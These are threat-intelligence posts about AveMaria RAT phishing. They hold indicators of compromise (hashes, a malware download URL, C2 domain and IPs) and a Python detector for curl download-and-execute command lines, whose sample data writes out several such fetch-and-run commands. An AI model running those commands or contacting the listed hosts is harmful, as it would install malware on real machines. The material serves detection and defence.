#AveMariaRAT
The email pretends to be a letter about a meeting between the Consul General of the Republic of Kazakhstan and the Ministry of Foreign Relations of the Astrakhan region.
- The email contains a vhdx attachment.
- The attachment contains a lnk and an archive file (decoy pdf).
- The lnk downloads the AveMaria payload using curl and executes it.
Тезисы.pdf.vhdx
56d1e9d11a8752e1c06e542e78e9c3e4
Download url:
http://45.61.137.32/www.exe
#AveMariaRAT
2300a4eb4bf1216506900e6040820843
C2:
hbfyewtuvfbhsbdjhjwebfy[.]net
193.188.20.163
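A defender-side sketch of the delivery step described in the first post above (a lnk that fetches the payload with curl and runs it), added here and not taken from any of the posts: it scans process-creation command lines for curl saving an executable that a chained command then runs. The sample command lines, the documentation IP and the paths are constructed, and treating download and execution as one command line is an assumption, since the posts do not show the lnk's actual command.

```python
import re
from urllib.parse import urlsplit

EXEC_EXT = (".exe", ".dll", ".scr", ".com", ".bat", ".cmd", ".ps1", ".vbs", ".hta")
CHAIN = re.compile(r"\s*(?:&&|\|\||&)\s*")  # cmd.exe separators (quoting ignored)

# Constructed process-creation command lines (documentation IP, made-up paths).
SAMPLE_CMDLINES = [
    r"cmd.exe /c curl -s -o %TEMP%\update.exe http://198.51.100.7/update.exe && %TEMP%\update.exe",
    r'cmd.exe /c curl.exe http://198.51.100.7/a.exe --output "C:\Users\Public\a.exe" & start C:\Users\Public\a.exe',
    r"curl.exe -o C:\tools\report.json https://example.com/api/report",
    r"curl -O https://example.com/setup.exe",
]

def _tokens(segment):
    # Whitespace-separated words; a double-quoted string stays one token.
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', segment)]

def _base(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def curl_fetch_and_run(cmdline):
    """Return (url, saved_path, host_is_ip) when curl saves an executable and a
    later command chained on the same line runs it; otherwise None."""
    segments = CHAIN.split(cmdline)
    for i, seg in enumerate(segments):
        toks = _tokens(seg)
        idx = next((n for n, t in enumerate(toks) if _base(t) in ("curl", "curl.exe")), None)
        if idx is None:
            continue
        args = toks[idx + 1:]
        url = next((a for a in args if a.lower().startswith(("http://", "https://"))), None)
        if url is None:
            continue
        out = None
        for n, a in enumerate(args):
            if a in ("-o", "--output") and n + 1 < len(args):
                out = args[n + 1]                      # explicit output path
            elif a in ("-O", "--remote-name"):
                out = urlsplit(url).path.rsplit("/", 1)[-1]  # name taken from URL
        if not out or not out.lower().endswith(EXEC_EXT):
            continue
        if any(_base(out) in map(_base, _tokens(s)) for s in segments[i + 1:]):
            host = urlsplit(url).hostname or ""
            return url, out, bool(re.fullmatch(r"\d{1,3}(\.\d{1,3}){3}", host))
    return None

def scan(cmdlines):
    return [c for c in cmdlines if curl_fetch_and_run(c)]
```

The first two constructed lines are flagged; the JSON download and the download that is never executed are not.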
Operation “Armor Piercer:” Targeted attacks in the Indian subcontinent using commercial RATs - By Asheer Malhotra, Vanja Svajcer and Justin Thattil.
Cisco Talos is tracking a c... http://feedproxy.google.com/~r/feedburner/Talos/~3/q-HOEjOIE_U/operation-armor-piercer.html #avemariarat #warzonerat #malware #netwire #securex #maldoc #apt #rat